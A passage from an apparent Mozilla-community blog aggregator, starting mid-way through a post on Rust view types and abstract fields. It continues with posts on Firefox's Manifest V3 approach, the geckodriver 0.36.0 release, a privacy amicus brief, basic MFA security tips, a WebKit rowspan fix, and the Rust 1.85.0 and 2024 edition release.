Consider the call to data.experiment_names(). In the compiler today, method lookup begins by examining data, of type &mut Data, auto-deref’ing by one step to yield Data, and then auto-ref’ing to yield &Data. The result is that this method call is desugared to a call like Data::experiment_names(&*data).

With view types, when introducing the auto-ref, we would also introduce a view operation. So we would get Data::experiment_names(& {?X} *data). What is this {?X}? That indicates that the set of allowed fields has to be inferred. A place-set variable ?X can be inferred to a set of fields or to * (all fields).

We would integrate these place-set variables into inference, so that {?A} Ta <: {?B} Tb if ?B is a subset of ?A and Ta <: Tb (e.g., {x, y} Foo <: {x} Foo). We would also allow dropping view types from subtypes, e.g., {*} Ta <: Tb if Ta <: Tb.

Place-set variables only appear as an internal inference detail, so users can’t (e.g.) write a function that is generic over a place-set, and the only kind of constraints you can get are subset (P1 <= P2) and inclusion (f in P1). I think it should be relatively straightforward to integrate these into HIR type check inference. When generalizing, we can replace each specific view set with a variable, just as we do for lifetimes. When we go to construct MIR, we would always know the precise set of fields we wish to include in the view. In the case where the set of fields is * we can also omit the view from the MIR.

Abstract fields

So, view types allow us to address these sorts of conflicts by making it more explicit what sets of fields we are going to access, but they introduce a new problem — does this mean that the names of our private fields become part of our interface? That seems obviously undesirable.

The solution is to introduce the idea of abstract[2] fields. An abstract field is a kind of pretend field, one that doesn’t really exist, but which you can talk about “as if” it existed. It lets us give symbolic names to data.

Abstract fields would be defined as aliases for a set of fields, like pub abstract field_name = (list-of-fields). An alias defines a public symbolic name for a set of fields.

We could therefore define two aliases for Data, one for the set of experiments and one for the count of successful experiments. I think it would be useful to allow these names to alias actual field names, as I think that in practice the compiler can always tell which set to use, but I would require that if an abstract field shares its name with an actual field, it is aliased to that field.

struct Data {
    pub abstract experiments = experiments,
    experiments: HashMap<String, Vec<f32>>,

    pub abstract successful = successful,
    successful: u32,
}

Now the view types we wrote earlier (& {experiments} self, etc) are legal but they refer to the abstract fields and not the actual fields.

Abstract fields permit refactoring

One nice property of abstract fields is that they permit refactoring. Imagine that we decide to change Data so that instead of storing experiments as a Map<String, Vec<f32>>, we put all the experimental data in one big vector and store a range of indices in the map, like Map<String, (usize, usize)>. We can do that no problem:

struct Data {
    pub abstract experiments = (experiment_indices, experiment_data),
    experiment_indices: Map<String, (usize, usize)>,
    experiment_data: Vec<f32>,

    // ...
}

We would still declare methods like &mut {experiments} self, but the compiler now understands that the abstract field experiments can be expanded to the set of private fields.

Frequently asked questions

Can abstract fields be mapped to an empty set of fields?

Yes, I think it should be possible to define pub abstract foo; to indicate the empty set of fields.

How do view types interact with traits and impls?

Good question. There is no necessary interaction; we could leave view types as simply a kind of type. You might do interesting things like implement Deref for a view on your struct:

struct AugmentedData {
    data: Vec<u32>,
    summary: u32,
}

impl Deref for {data} AugmentedData {
    type Target = [u32];

    fn deref(&self) -> &[u32] {
        // type of `self` is `&{data} AugmentedData`
        &self.data
    }
}

OK, you don’t need to integrate abstract fields with traits, but could you?

Yes! And it’d be interesting. You could imagine declaring abstract fields as trait members that can appear in its interface:

trait Interface {
    abstract data1;
    abstract data2;


    fn get_data1(&{data1} self) -> u32;
    fn get_data2(&{data2} self) -> u32;
}

You could then define those fields in an impl. You can even map some of them to real fields and leave some as purely abstract:

struct OneCounter {
    counter: u32,
}

impl Interface for OneCounter {
    abstract data1 = counter;
    abstract data2;

    fn get_data1(&{counter} self) -> u32 {
        self.counter
    }

    fn get_data2(&{data2} self) -> u32 {
        0 // no fields needed
    }
}

Could view types include more complex paths than just fields?

Although I wouldn’t want to at first, I think you could permit something like {foo.bar} Baz and then, given something like &foo.bar, you’d get the type &{bar} Baz, but I’ve not really thought about it more deeply than that.

Can view types be involved in moves?

Yes! You should be able to do something like

struct Strings {
    a: String,
    b: String,
    c: String,
}

fn play_games(s: Strings) {
    // Moves the struct `s` but only the fields `a` and `c`
    let t: {a, c} Strings = {a, c} s;

    println!("{}", s.a); // ERROR: s.a has been moved
    println!("{}", s.b); // OK.
    println!("{}", s.c); // ERROR: s.c has been moved

    println!("{}", t.a); // OK.
    println!("{}", t.b); // ERROR: no access to field `b`.
    println!("{}", t.c); // OK.
}

Why did you have a subtyping rule to drop view types from sub- but not super-types?

I described the view type subtyping rules as two rules:

  • {?A} Ta <: {?B} Tb if ?B is a subset of ?A and Ta <: Tb
  • {*} Ta <: Tb if Ta <: Tb

In principle we could have a rule like Ta <: {*} Tb if Ta <: Tb — this rule would allow “introducing” a view type into the supertype. We may wind up needing such a rule but I didn’t want it because it meant that code like this really ought to compile (using the Strings type from the previous question):

fn play_games(s: Strings) {
   let t: {a, c} Strings = s; // <— just `= s`, not `= {a, c} s`.
}

I would expect this to compile because

Strings <: {*} Strings <: {a, c} Strings

but I kind of don’t want it to compile.

Are there other uses for abstract fields?

Yes! I think abstract fields would also be useful in two other ways (though we have to stretch their definition a bit). I believe it’s important for Rust to grow stronger integration with theorem provers; I don’t expect these to be widely used, but for certain key libraries (stdlib, zerocopy, maybe even tokio) it’d be great to be able to mathematically prove type safety. But mathematical proof systems often require a notion of ghost fields — basically logical state that doesn’t really exist at runtime but which you can talk about in a proof. A ghost field is essentially an abstract field that is mapped to an empty set of fields and which has a type. For example you might declare a BeanCounter struct with two abstract fields (a, b) and one real field that stores their sum:

struct BeanCounter {
    pub abstract a: u32,
    pub abstract b: u32,
    sum: u32, // <— at runtime, we only store the sum
}

then when you create BeanCounter you would specify a value for those fields. The value would perhaps be written using something like an abstract block, indicating that in fact the code within will not be executed (but must still be type checkable):

impl BeanCounter {
    pub fn new(a: u32, b: u32) -> Self {
        Self { a: abstract { a }, b: abstract { b }, sum: a + b }
    }
}

Providing abstract values is useful because it lets the theorem prover act “as if” the code was there for the purpose of checking pre- and post-conditions and other kinds of contracts.

Could we use abstract fields to replace phantom data?

Yes! I imagine that instead of a: PhantomData<T> you could do abstract a: T, but that would mean we’d have to have some abstract initializer. So perhaps we permit an anonymous field abstract _: T, in which case you wouldn’t be required to provide an initializer, but you also couldn’t name it in contracts.
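For readers who have not used PhantomData, here is a rough sketch (purely illustrative; the Wrapper type is my own assumption, not something from this post) of the kind of zero-sized marker field in today's Rust that such an anonymous abstract field could stand in for:

use std::marker::PhantomData;

// `Wrapper` is logically tied to `T` (say, via data behind the raw pointer)
// without storing a `T` directly, so it carries a zero-sized marker field.
struct Wrapper<T> {
    raw: *const u8,
    _marker: PhantomData<T>,
}

impl<T> Wrapper<T> {
    fn new(raw: *const u8) -> Self {
        Wrapper { raw, _marker: PhantomData }
    }
}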

So what are all the parts to an abstract field?

I would start with just the simplest form of abstract fields, which is an alias for a set of real fields. But to extend to cover ghost fields or PhantomData, you want to support the ability to declare a type for abstract fields (we could say that the default is ()). For fields with non-() types, you would be expected to provide an abstract value in the struct constructor. To conveniently handle PhantomData, we could add anonymous abstract fields where no type is needed.

Should we permit view types on other types?

I’ve shown view types attached to structs and tuples. Conceivably we could permit them elsewhere, e.g., {0} &(String, String) might be equivalent to &{0} (String, String). I don’t think that’s needed for now and I’d make it ill-formed, but it could be reasonable to support at some point.

Conclusion

This concludes my exploration through view types. The post actually changed as I wrote it — initially I expected to include place-based borrows, but it turns out we didn’t really need those. I also initially expected view types to be a special case of struct types, and that indeed might simplify things, but I wound up concluding that they are a useful type constructor on their own. In particular if we want to integrate them into traits it will be necessary for them to be applied to generics and the rest.

In terms of next steps, I’m not sure; I want to think about this idea more, but I do feel we need to address this gap in Rust, and so far view types seem like the most natural approach. I think what could be interesting is to prototype them in a-mir-formality as it evolves to see if there are other surprises that arise.


  1. I’m not really proposing this syntax—among other things, it is ambiguous in expression position. I’m not sure what the best syntax is, though! It’s an important question, but not one I will think hard about here. ↩︎

  2. I prefer the name ghost fields, because it’s spooky, but abstract is already a reserved keyword. ↩︎

The Mozilla BlogMozilla’s approach to Manifest V3: What’s different and why it matters for extension users

Extensions are like apps for your browser, letting you customize and enhance your online experience. Nearly half of all Firefox users have installed at least one extension, from privacy tools to productivity boosters.

To build these extensions, developers rely on a platform called WebExtensions, which provides APIs — the tools that allow extensions to interact with web pages and browser features. Right now, all major browsers — including Firefox, Chrome and Safari — are implementing the latest version of this platform, Manifest V3. But different browsers are taking different approaches, and those differences affect which extensions you can use.

Firefox’s approach to Manifest V3 is shaped by our mission

Principle 5 of the Mozilla Manifesto states: Individuals must have the ability to shape the internet and their own experiences on it. That philosophy drives our approach to Manifest V3.

  • More creative possibilities for developers — We’ve introduced a broader range of APIs, including new AI functionality that allows extensions to run offline machine learning tasks directly in the browser.
  • Support for both Manifest V2 and V3 — While some browsers are phasing out Manifest V2 entirely, Firefox is keeping it alongside Manifest V3. More tools for developers means more choice and innovation for users.

Giving people choice and control on the internet has always been core to Mozilla. It’s all about making sure users have the freedom to shape their own experiences online.

No limits on your extensions with Firefox

Google began phasing out Manifest V2 last year and plans to end support for extensions built on it by mid-2025. That change has real consequences: Chrome users are already losing access to uBlock Origin, one of the most popular ad blockers, because it relies on a Manifest V2 feature called blockingWebRequest.

Google’s approach replaces blockingWebRequest with declarativeNetRequest, which limits how extensions can filter content. Since APIs define what extensions can and can’t do inside a browser, restricting certain APIs can limit what types of extensions are possible.

Firefox, however, will continue supporting both blockingWebRequest and declarativeNetRequest — giving developers more flexibility and keeping powerful privacy tools available to users. We’ll keep you updated on what’s next for extensions in Firefox. In the meantime, check out addons.mozilla.org to explore thousands of ways to customize your Firefox.

The post Mozilla’s approach to Manifest V3: What’s different and why it matters for extension users appeared first on The Mozilla Blog.

Firefox Developer ExperienceGeckodriver 0.36.0 Released

We are proud to announce the next major release of geckodriver 0.36.0. It ships with some new features and fixes to improve your WebDriver experience.

Contributions

With geckodriver being an open source project, we are grateful to get contributions from people outside of Mozilla:

  • Gatlin Newhouse added support for searching the Firefox Developer Edition’s default path on macOS.

Geckodriver code is written in Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for geckodriver.

Added

  • Support for searching the Firefox Developer Edition’s default path on macOS. Implemented by Gatlin Newhouse.
  • Ability to push a WebExtension archive, created from a base64 encoded string, to an Android device.
  • Added an allowPrivateBrowsing field for POST /session/{session id}/moz/addon/install to allow the installation of a WebExtension that is enabled in Private Browsing mode.
  • Introduced the --allow-system-access command line argument for geckodriver, which will be required for future versions of Firefox (potentially starting with 138.0) to allow testing in the chrome context.
  • Added support for preserving crash dumps for crash report analysis when Firefox crashes. If the MINIDUMP_SAVE_PATH environment variable is set to an existing folder, crash dumps will be saved accordingly. For mobile devices, the generated minidump files will be automatically transferred to the host machine. For more details see the documentation of how to handle crash reports.

Changed

  • Updated the type of the x and y fields of pointer move actions (mouse and touch) from integer to fractional numbers to ensure a more precise input control.
  • Replaced serde_yaml with yaml-rust because serde_yaml is no longer officially supported.
  • The --enable-crash-reporter command line argument has been deprecated to prevent crash reports from being submitted to Socorro. This argument will be completely removed in the next version. Instead, use the MINIDUMP_SAVE_PATH environment variable to get minidump files saved to a specified location.

Fixed

  • Fixed route registration for WebAuthn commands, which were introduced in geckodriver 0.34.0 but mistakenly registered under /sessions/ instead of /session/, causing them to be non-functional.

Removed

  • Removed usage of the -no-remote command-line argument for Firefox, which no longer exists.

Downloads

Geckodriver 0.36.0 can be downloaded for all supported platforms as usual from our GitHub release page.

Mozilla Open Policy & Advocacy BlogMozilla Joins Amicus Brief in Support of Law That Protects Your Private Messages

Today Mozilla has joined an amicus brief in the California Supreme Court defending statutory privacy protections for messages on services such as Snapchat or Facebook. The amicus brief asks the court to overrule a lower court opinion that would significantly reduce the legal privacy protections for users of these widely used services. Mozilla is joined on the brief by the Electronic Frontier Foundation and the Center for Democracy and Technology.

Back in 1986, Congress passed a law called the Stored Communications Act (SCA) to provide privacy protections for stored electronic communications such as email. The SCA prohibits service providers from sharing private messages with the government or other third-parties without authorization. For example, it requires that the government must get a warrant to access recent communications (or at least a subpoena in other circumstances). In the years since 1986, it is fair to say we have developed many new forms of digital communication. Fortunately, the language of the SCA is sufficiently general (it uses the term “electronic communication service”) that courts have applied it to a large array of new products.

Unfortunately, a California court recently narrowed the scope of the SCA. In the case of Snap v. The Superior Court of San Diego County, the California Court of Appeal ruled that the SCA does not protect users of Snapchat and Facebook. The court concluded that the SCA does not apply because, in addition to facilitating transmission of messages and storing backups, these companies also maintain that content for their own business purposes such as targeted advertising. If upheld, this ruling would remove the SCA’s protection not just for users of Snap and Facebook, but for many other modern forms of communication.

While we may criticize some of Snap or Meta’s data practices, it would only compound the privacy harm to their users to hold that their privacy policies take them outside the scope of the SCA, with potential ramifications for the users of other services in the future. Our brief argues that this is both wrong on the law and bad policy. We hope the California Supreme Court will fix the lower court’s error and restore key statutory privacy protections to modern messaging services.

The post Mozilla Joins Amicus Brief in Support of Law That Protects Your Private Messages appeared first on Open Policy & Advocacy.

Tantek ÇelikCSF_01: Three Steps for IndieWeb Cybersecurity

Welcome to my first Cybersecurity Friday (CSF) post. Almost exactly one week ago I experienced (and had to fight & recover from) a cybersecurity incident. While that’s a much longer story, this post series is focused on sharing tips and incident learnings from an #indieweb-centric perspective.

Steps for Cybersecurity

Here are the top three steps, in order of importance, that you should take ASAP to secure your online presence.

  1. Email MFA/2FA. Add multi-factor authentication (MFA) using an actual Authenticator application to all places where you store or check email. Some services call this second factor or two factor authentication (2FA). While checking your email security settings, verify recovery settings: Do not cross-link your emails as recovery methods for each other, and do not use a mobile/cell number for recovery at all.
  2. Domain Registrar MFA. Add MFA to your Domain Registrar(s) if you have any. Optionally disable password reset emails if possible (some registrars may allow this).
  3. Web Host MFA. Add MFA to your web hosting service(s) if you have any. This includes both website hosting and any content delivery network (CDN) services you are using for your domains.

Do not use a mobile number for MFA, nor a physical/hardware key if you travel internationally. There are very good reasons to avoid doing so. I’ll blog the reasons in another post.

Those are my top three recommended cybersecurity steps for protecting your internet presence. That’s it for this week. These are the bare minimum steps to take. There are many more steps you can take to strengthen your personal cybersecurity. I will leave you with this for now:

Entropy is your friend in security.

Glossary

Glossary for various terms, phrases, and further reading on each.

content delivery network
https://indieweb.org/content_delivery_network
cybersecurity
https://en.wikipedia.org/wiki/cybersecurity
domain registrar
https://indieweb.org/domain_registrar
email recovery
A method for recovering a service account password via the email account associated with that account. See also: https://en.wikipedia.org/wiki/Password_notification_email
entropy
https://en.wikipedia.org/wiki/Entropy_(information_theory)
MFA / 2FA
https://indieweb.org/multi-factor_authentication sometimes called Two Factor Authentication or Second Factor Authentication
mobile number for MFA
https://indieweb.org/SMS#Criticism
web host
https://indieweb.org/web_hosting

Syndicated to: IndieNews

Karl DubostFixing rowspan=0 on tables on WebKit.

stacked tables and chairs in the street.

Last week, I mentioned there were easy ways to fix or help the WebKit project.

Find The Bug

In January, looking at the FIXME: mentions on the WebKit project, I found this piece of code:

unsigned HTMLTableCellElement::rowSpan() const
{
    // FIXME: a rowSpan equal to 0 should be allowed, and mean that the cell is to span all the remaining rows in the row group.
    return std::max(1u, rowSpanForBindings());
}

Searching on bugs.webkit.org, I found this bug opened by Simon Fraser on May 5, 2018: rowspan="0" results in different table layout than Firefox/Chrome. Would I be able to solve it?

Test The Bug

The first task is very simple: understand how the renderings differ between browsers.

Simon had already created a testcase and Ahmad had created a screenshot for it showing the results of the testcase in Safari, Firefox and Chrome. This work was already done. If they had been missing, that would have been my first step.

Read The Specification

To get a better understanding of the issue, it is useful to read the specification related to this bug. In this case, the relevant information was in the HTML specification, where the rowspan attribute on td/th elements is described. This is the text we need:

The td and th elements may also have a rowspan content attribute specified, whose value must be a valid non-negative integer less than or equal to 65534. For this attribute, the value zero means that the cell is to span all the remaining rows in the row group.

Create More Tests

Let's take a normal simple table which is 3 by 3.

<table border="1">
  <tr><td>A1</td><td>B1</td><td>C1</td></tr>
  <tr><td>A2</td><td>B2</td><td>C2</td></tr>
  <tr><td>A3</td><td>B3</td><td>C3</td></tr>
</table>

We might want to make the first cell overlap the 3 rows of the table. A way to do that is to set rowspan="3" because there are 3 rows.

<table border="1">
  <tr><td rowspand="3">A1</td><td>B1</td><td>C1</td></tr>
  <tr>                        <td>B2</td><td>C2</td></tr>
  <tr>                        <td>B3</td><td>C3</td></tr>
</table>

This will create a table where the first column will overlap the 3 rows. This is already working as expected in all rendering engines: WebKit, Gecko and Blink. So far, so good.

Think About The Logic

I learned from reading the specification that rowspan had a maximum value: 65534.

My initial train of thoughts was:

  1. compute the number of rows of the table.
  2. parse the rowspan value
  3. when the value is 0, replace it with the number of rows.

It seemed too convoluted. Would it be possible to use the maximum value for rowspan? The specification was saying "span all the remaining rows in the row group".

I experimented with a rowspan value bigger than the number of rows. For example, putting the value 30 on a 3-row table.

<table border="1">
  <tr><td rowspand="30">A1</td><td>B1</td><td>C1</td></tr>
  <tr>                         <td>B2</td><td>C2</td></tr>
  <tr>                         <td>B3</td><td>C3</td></tr>
</table>

I checked in Firefox, Chrome, and Safari. I got the same rendering. We were on the right track. Let's use the maximum value for rowspan.

I made a test case with additional examples to be able to check the behavior in different browsers:

Rendering of the table bug in Safari.

Fixing The Code

We just had to try to change the C++ code. My patch was

diff --git a/Source/WebCore/html/HTMLTableCellElement.cpp b/Source/WebCore/html/HTMLTableCellElement.cpp
index 256c816acc37b..65450c01e369a 100644
--- a/Source/WebCore/html/HTMLTableCellElement.cpp
+++ b/Source/WebCore/html/HTMLTableCellElement.cpp
@@ -59,8 +59,14 @@ unsigned HTMLTableCellElement::colSpan() const

 unsigned HTMLTableCellElement::rowSpan() const
 {
-    // FIXME: a rowSpan equal to 0 should be allowed, and mean that the cell is to span all the remaining rows in the row group.
-    return std::max(1u, rowSpanForBindings());
+    unsigned rowSpanValue = rowSpanForBindings();
+    // when rowspan=0, the HTML spec says it should apply to the full remaining rows.
+    // In https://html.spec.whatwg.org/multipage/tables.html#attr-tdth-rowspan
+    // > For this attribute, the value zero means that the cell is
+    // > to span all the remaining rows in the row group.
+    if (!rowSpanValue)
+        return maxRowspan;
+    return std::max(1u, rowSpanValue);
 }

 unsigned HTMLTableCellElement::rowSpanForBindings() const

If rowspan was 0, just give the maximum value which is defined in HTMLTableCellElement.h.

I compiled the code change and verified the results:

Rendering of the table bug in Safari but this time fixed.

(note for the careful reader the last table legend is wrong, it should be rowspan="3")

This was fixed! A couple of tests needed to be rebaselined. I was ready to send a Pull Request for this bug.

What Is Next?

The fix is not yet available on the current version of Safari, but you can experiment it with Safari Technology Preview (STP 213 Release Notes).

The biggest part of fixing the bugs is researching, testing different HTML scenarios without even touching the C++ code, etc. I'm not a C++ programmer, but from time to time I can find bugs that are easy enough to understand that I can fix them. I hope this makes it easier for you to understand, and encourages you to look at other bugs.

Note also that it is not always necessary to take a fix all the way to modifying the code. Sometimes, just creating test cases, screenshots, pointing to the right places in the specifications, or creating the WPT test cases covering the bug are all super useful.

PS: Doing all this work, I also found out about the behavior of colspan, which is interoperable (same behavior in all browsers), but which I find illogical compared to the behavior of rowspan.

Otsukare!

Niko MatsakisRust 2024 Is Coming

So, a little bird told me that Rust 2024 is going to become stable today, along with Rust 1.85.0. In honor of this momentous event, I have penned a little ditty that I’d like to share with you all. Unfortunately, for those of you who remember Rust 2021’s “Edition: The song”, in the 3 years between Rust 2021 and now, my daughter has realized that her father is deeply uncool[1] and so I had to take this one on solo[2]. Anyway, enjoy! Or, you know, suffer. As the case may be.

Video

Watch the movie embedded here, or watch it on YouTube:

Lyrics

In ChordPro format, for those of you who are inspired to play along.

{title: Rust 2024}
{subtitle: }

{key: C}

[Verse 1]
[C] When I got functions that never return
I write an exclamation point [G]
But use it for an error that could never be
the compiler [C] will yell at me

[Verse 2]
[C] We Rust designers, we want that too
[C7] But we had to make a [F] change
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Bridge]
[Am] ... [Am] But will my program [E] build?
[Am] Yes ... oh that’s [D7] for sure
[F] edi-tions [G] are [C] opt in

[Verse 3]
[C] Usually when I return an `impl Trait`
everything works out fine [G]
but sometimes I need a tick underscore
and I don’t really [C] know what that’s for

[Verse 4]
[C] We Rust designers we do agree
[C7] That was con- [F] fusing 
[F] But that will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Bridge 2]
[Am] Cargo fix will make the changes
automatically [G] Oh that sure sounds great...
[Am] but wait... [Am] my de-pen-denc-[E]-ies
[Am] Don’t worry e-[D7]ditions
[F] inter [G] oper [C] ate

[Verse 5]
[C] Whenever I match on an ampersand T
The borrow [G] propagates
But where do I put the ampersand
when I want to [C] copy again?

[Verse 6]
[C] We Rust designers, we do agree
[C7] That really had to [F] change
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Outro]
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

One more time!

[Half speed]
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

  1. It was bound to happen eventually. ↩︎

  2. Actually, I had a plan to make this a duet with somebody who shall remain nameless (they know who they are). But I was too lame to get everything done on time. In fact, I may or may not have realized “Oh, shit, I need to finish this recording!” while in the midst of a beer with Florian Gilcher last night. Anyway, sorry, would-be-collaborator-I-was-really-looking-forward-to-playing-with! Next time! ↩︎

The Rust Programming Language BlogAnnouncing Rust 1.85.0 and Rust 2024

The Rust team is happy to announce a new version of Rust, 1.85.0. This stabilizes the 2024 edition as well. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.85.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.85.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.85.0 stable

Rust 2024

We are excited to announce that the Rust 2024 Edition is now stable! Editions are a mechanism for opt-in changes that may otherwise pose a backwards compatibility risk. See the edition guide for details on how this is achieved, and detailed instructions on how to migrate.

This is the largest edition we have released. The edition guide contains detailed information about each change, but as a summary, here are all the changes:

Migrating to 2024

The guide includes migration instructions for all new features, and in general transitioning an existing project to a new edition. In many cases cargo fix can automate the necessary changes. You may even find that no changes in your code are needed at all for 2024!

Note that automatic fixes via cargo fix are very conservative to avoid ever changing the semantics of your code. In many cases you may wish to keep your code the same and use the new semantics of Rust 2024; for instance, continuing to use the expr macro matcher, and ignoring the conversions of conditionals because you want the new 2024 drop order semantics. The result of cargo fix should not be considered a recommendation, just a conservative conversion that preserves behavior.
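As one hedged illustration of the drop-order change mentioned above (my own sketch in the spirit of the edition guide's if let temporary rescoping, not an excerpt from it): in Rust 2024 the temporary created by an if let scrutinee is dropped before the else branch runs, so the second borrow below succeeds, whereas under Rust 2021 semantics the first borrow was still alive there and this would panic at runtime:

use std::cell::RefCell;

fn main() {
    let cell = RefCell::new(None::<i32>);

    // The `Ref` guard produced by `cell.borrow()` is a temporary of the scrutinee.
    if let Some(x) = *cell.borrow() {
        println!("got {x}");
    } else {
        // Rust 2024: the shared borrow above has already ended, so this works.
        // Rust 2021: the guard was still held here, and `borrow_mut` panicked.
        *cell.borrow_mut() = Some(1);
    }
}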

Many people came together to create this edition. We'd like to thank them all for their hard work!

async closures

Rust now supports asynchronous closures like async || {} which return futures when called. This works like an async fn which can also capture values from the local environment, just like the difference between regular closures and functions. This also comes with 3 analogous traits in the standard library prelude: AsyncFn, AsyncFnMut, and AsyncFnOnce.

In some cases, you could already approximate this with a regular closure and an asynchronous block, like || async {}. However, the future returned by such an inner block is not able to borrow from the closure captures, but this does work with async closures:

let mut vec: Vec<String> = vec![];

let closure = async || {
    vec.push(ready(String::from("")).await);
};
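As a small follow-on sketch (mine, not from the release notes): to actually call such a closure it must be bound as mut, since it captures vec by mutable reference, and each call produces a future to await. The names push_one and demo are just illustrative:

use std::future::ready;

async fn demo() {
    let mut vec: Vec<String> = vec![];

    let mut push_one = async || {
        vec.push(ready(String::from("hi")).await);
    };

    // Each call returns a future; awaiting it runs the closure body to completion.
    push_one().await;
    push_one().await;

    // The closure's mutable borrow of `vec` ends with its last use above.
    assert_eq!(vec.len(), 2);
}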

It also has not been possible to properly express higher-ranked function signatures with the Fn traits returning a Future, but you can write this with the AsyncFn traits:

use core::future::Future;
async fn f<Fut>(_: impl for<'a> Fn(&'a u8) -> Fut)
where
    Fut: Future<Output = ()>,
{ todo!() }

async fn f2(_: impl for<'a> AsyncFn(&'a u8))
{ todo!() }

async fn main() {
    async fn g(_: &u8) { todo!() }
    f(g).await;
    //~^ ERROR mismatched types
    //~| ERROR one type is more general than the other

    f2(g).await; // ok!
}

So async closures provide first-class solutions to both of these problems! See RFC 3668 and the stabilization report for more details.

Hiding trait implementations from diagnostics

The new #[diagnostic::do_not_recommend] attribute is a hint to the compiler to not show the annotated trait implementation as part of a diagnostic message. For library authors, this is a way to keep the compiler from making suggestions that may be unhelpful or misleading. For example:

pub trait Foo {}
pub trait Bar {}

impl<T: Foo> Bar for T {}

struct MyType;

fn main() {
    let _object: &dyn Bar = &MyType;
}
error[E0277]: the trait bound `MyType: Bar` is not satisfied
 --> src/main.rs:9:29
  |
9 |     let _object: &dyn Bar = &MyType;
  |                             ^^^^ the trait `Foo` is not implemented for `MyType`
  |
note: required for `MyType` to implement `Bar`
 --> src/main.rs:4:14
  |
4 | impl<T: Foo> Bar for T {}
  |         ---  ^^^     ^
  |         |
  |         unsatisfied trait bound introduced here
  = note: required for the cast from `&MyType` to `&dyn Bar`

For some APIs, it might make good sense for you to implement Foo, and get Bar indirectly by that blanket implementation. For others, it might be expected that most users should implement Bar directly, so that Foo suggestion is a red herring. In that case, adding the diagnostic hint will change the error message like so:

#[diagnostic::do_not_recommend]
impl<T: Foo> Bar for T {}
error[E0277]: the trait bound `MyType: Bar` is not satisfied
  --> src/main.rs:10:29
   |
10 |     let _object: &dyn Bar = &MyType;
   |                             ^^^^ the trait `Bar` is not implemented for `MyType`
   |
   = note: required for the cast from `&MyType` to `&dyn Bar`

See RFC 2397 for the original motivation, and the current reference for more details.

FromIterator and Extend for tuples

Earlier versions of Rust implemented convenience traits for iterators of (T, U) tuple pairs to behave like Iterator::unzip, with Extend in 1.56 and FromIterator in 1.79. These have now been extended to more tuple lengths, from singleton (T,) through to 12 items long, (T1, T2, .., T11, T12). For example, you can now use collect() to fanout into multiple collections at once:

use std::collections::{LinkedList, VecDeque};
fn main() {
    let (squares, cubes, tesseracts): (Vec<_>, VecDeque<_>, LinkedList<_>) =
        (0i32..10).map(|i| (i * i, i.pow(3), i.pow(4))).collect();
    println!("{squares:?}");
    println!("{cubes:?}");
    println!("{tesseracts:?}");
}
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
[0, 1, 8, 27, 64, 125, 216, 343, 512, 729]
[0, 1, 16, 81, 256, 625, 1296, 2401, 4096, 6561]

Updates to std::env::home_dir()

std::env::home_dir() has been deprecated for years, because it can give surprising results in some Windows configurations if the HOME environment variable is set (which is not the normal configuration on Windows). We had previously avoided changing its behavior, out of concern for compatibility with code depending on this non-standard configuration. Given how long this function has been deprecated, we're now updating its behavior as a bug fix, and a subsequent release will remove the deprecation for this function.

Stabilized APIs

These APIs are now stable in const contexts

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.85.0

Many people came together to create Rust 1.85.0. We couldn't have done it without all of you. Thanks!

The Mozilla BlogGrowing Mozilla — and evolving our leadership

Since 2022, Mozilla has been in an active process evolving what we do – and renewing our leadership. Today we announced several updates on the leadership piece of this ongoing work. 

We’ve recognized that Mozilla faces major headwinds in terms of both financial growth and mission impact. While Firefox remains the core of what we do, we also need to take steps to diversify: investing in privacy-respecting advertising to grow new revenue in the near term; developing trustworthy, open source AI to ensure technical and product relevance in the mid term; and creating online fundraising campaigns that will draw a bigger circle of supporters over the long run. Mozilla’s impact and survival depend on us simultaneously strengthening Firefox AND finding new sources of revenue AND manifesting our mission in fresh ways. That is why we’re working hard on all of these fronts.

We’ve also moved aggressively to attract new leadership and talent to Mozilla. This includes major growth in our Boards, with 40% new Board members since we began our efforts to evolve and grow back in 2022. We’ve also been bringing in new executive talent, including a new MoFo Executive Director and a Managing Partner for Mozilla Ventures. By the end of the year, we hope to have new, permanent CEOs for both MoCo and Mozilla.ai. 

Today we shared two updates as we continue to push forward with this renewal at the leadership level:

1. Mozilla Leadership Council: 

We are creating a Mozilla Leadership Council composed of the top executive from each of Mozilla’s organizations. This includes: Jane Silber (Mozilla.ai), Laura Chambers (Mozilla Corporation), Mohamed Nanabhay (Mozilla Ventures), Nabiha Syed (Mozilla Foundation), Ryan Sipes (MZLA/Thunderbird) and myself. I will act as chair. The purpose of this group is to better coordinate work across our organizations to make sure that Mozilla is more than the sum of its parts. 

2. New Board Chairs: 

Mozilla has built a strong cadre of 16 directors across all of our Boards, bringing an incredible breadth of experience and a commitment to supporting Mozilla in doing the hard and important work ahead. Today we are announcing three new Board chairs: 

  • The new Mozilla Foundation Board Chair is Nicole Wong. Nicole is a respected cross-sector privacy and policy expert and innovator, with leadership roles at Google and Twitter/X, service as Deputy U.S. Chief Technology Officer and positions on multiple corporate and non-profit boards. Nicole has been on Mozilla Foundation’s Board for 8 years. 
  • Kerry Cooper will chair Mozilla Corporation. One of the world’s most respected CMOs and consumer executives, Kerry has held C-Suite roles at Walmart.com, Rothy’s, Choose Energy and more, and now serves on boards spanning venture, startups and AI innovation. Kerry has been on Mozilla Corporation’s Board for 2 years.
  • Raffi Krikorian will chair Mozilla.ai. Raffi is a visionary technologist, engineer and leader, who was an early engineering leader at Twitter, headed Uber’s self-driving car lab, and is now CTO at the Emerson Collective where he works at the intersection of emerging technologies and social good. He brings three decades of thoughtful design and implementation within social media and artificial intelligence to Mozilla.

Each of these leaders reflects what I believe will be Mozilla’s ‘secret sauce’ in our next chapter: a mix of experience bridging business, technology and the public interest. Note that these appointments are now reflected on our leadership page.

